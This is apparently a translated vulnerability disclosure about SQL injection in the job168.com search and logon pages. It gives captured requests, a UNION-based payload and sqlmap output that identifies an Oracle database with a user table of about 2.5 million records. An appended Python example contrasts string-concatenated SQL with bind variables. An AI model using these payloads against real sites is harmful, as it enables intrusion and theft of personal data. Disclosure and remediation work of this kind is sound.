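2015-09-23: Details reported to the vendor; waiting for the vendor to handle them.
2015-09-28: The vendor chose to ignore the vulnerability; details disclosed to the public.
As the title says.
That makes more than 20 vulnerabilities.
POST-based injection. Captured requests: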
POST /person/logon.jsp?towhere=pic.jsp HTTP/1.1
Host: www.job168.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.job168.com/
Cookie: JSESSIONID=abceIe7DSCJHYf8Nv33-u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

POST /train/searchresult.jsp HTTP/1.1
Host: www.job168.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.job168.com/train/searchresult.jsp
Cookie: JSESSIONID=abceIe7DSCJHYf8Nv33-u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

course_type=B0116&school_loc=0115&mdate=15&keyword=11%27&im.x=28&im.y=9account=
The data came out right away without any trouble:
Place: POST
Parameter: keyword
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: course_type=B0116&school_loc=0115&mdate=15&keyword=11' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(117)||CHR(101)||CHR(118)||CHR(58)||CHR(99)||CHR(81)||CHR(107)||CHR(113)||CHR(115)||CHR(79)||CHR(72)||CHR(114)||CHR(121)||CHR(100)||CHR(58)||CHR(99)||CHR(112)||CHR(106)||CHR(58), NULL FROM DUAL-- &im.x=28&im.y=9account=
---
[09:54:28] [INFO] testing Oracle
[09:54:29] [INFO] confirming Oracle
[09:54:30] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[09:54:30] [INFO] fetching current user
current user: 'NFRC'
Only 3 tables were enumerated, because the data has to be extracted piece by piece, which is too slow:
GLOBAL_USERASSIGNINUEST
The key table holds information on 2.5 million users:
Database: NFRC
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| GLOBAL_USER | 2517362 |
+-------------+---------+
The leaked information includes ID card numbers, account passwords, names, and so on; I won't post it here!
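The root cause behind the `keyword` finding above, shown as an added example that is not part of the original report and is not the site's code: a search handler that concatenates `keyword` into the SQL text, next to the bind-variable form that closes the hole. The table, column names and function names are hypothetical, SQLite stands in for the Oracle back end, and the UNION string is a constructed SQLite-syntax analogue of the payload in the sqlmap output.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed 8-column table, matching "8 columns" in the sqlmap output above.
COLS = "id, course_type, school_loc, mdate, title, teacher, summary, price"
# Request body exactly as captured on the page.
PAGE_BODY = "course_type=B0116&school_loc=0115&mdate=15&keyword=11%27&im.x=28&im.y=9account="
# Constructed SQLite-syntax analogue of the page's UNION payload (marker in column 7).
UNION_PROBE = "11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,'MARKER',NULL-- "


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE course ({COLS})")
    db.executemany("INSERT INTO course VALUES (?,?,?,?,?,?,?,?)", [
        (1, "B0116", "0115", 15, "Java 11 basics", "Li", "intro", 100),
        (2, "B0116", "0115", 15, "Oracle admin", "Wang", "dba", 200),
    ])
    return db


def keyword_from_body(body):
    # URL-decode the form body; %27 becomes a single quote.
    return parse_qs(body, keep_blank_values=True)["keyword"][0]


def search_vulnerable(db, keyword):
    # Hypothetical "before": the keyword is pasted into the SQL text,
    # so a quote closes the string literal and the rest is parsed as SQL.
    return db.execute(
        f"SELECT {COLS} FROM course WHERE title LIKE '%{keyword}%'").fetchall()


def search_hardened(db, keyword):
    # Bind variable: the keyword is only ever data. LIKE wildcards are
    # escaped as well so "%" or "_" cannot widen the match.
    esc = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return db.execute(
        f"SELECT {COLS} FROM course WHERE title LIKE ? ESCAPE '\\'",
        (f"%{esc}%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for kw in (keyword_from_body(PAGE_BODY), UNION_PROBE, "11"):
        try:
            print(repr(kw), "vulnerable ->", search_vulnerable(db, kw))
        except sqlite3.OperationalError as exc:
            print(repr(kw), "vulnerable -> SQL error:", exc)
        print(repr(kw), "hardened   ->", search_hardened(db, kw))
```

With the bind variable, the quote probe from the captured request no longer produces a SQL error and the UNION string matches nothing, while an ordinary keyword still returns its row.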
Severity: no impact, ignored by the vendor
Ignored at: 2015-09-28 16:26
Vulnerability Rank: 4 (WooYun rating)
None yet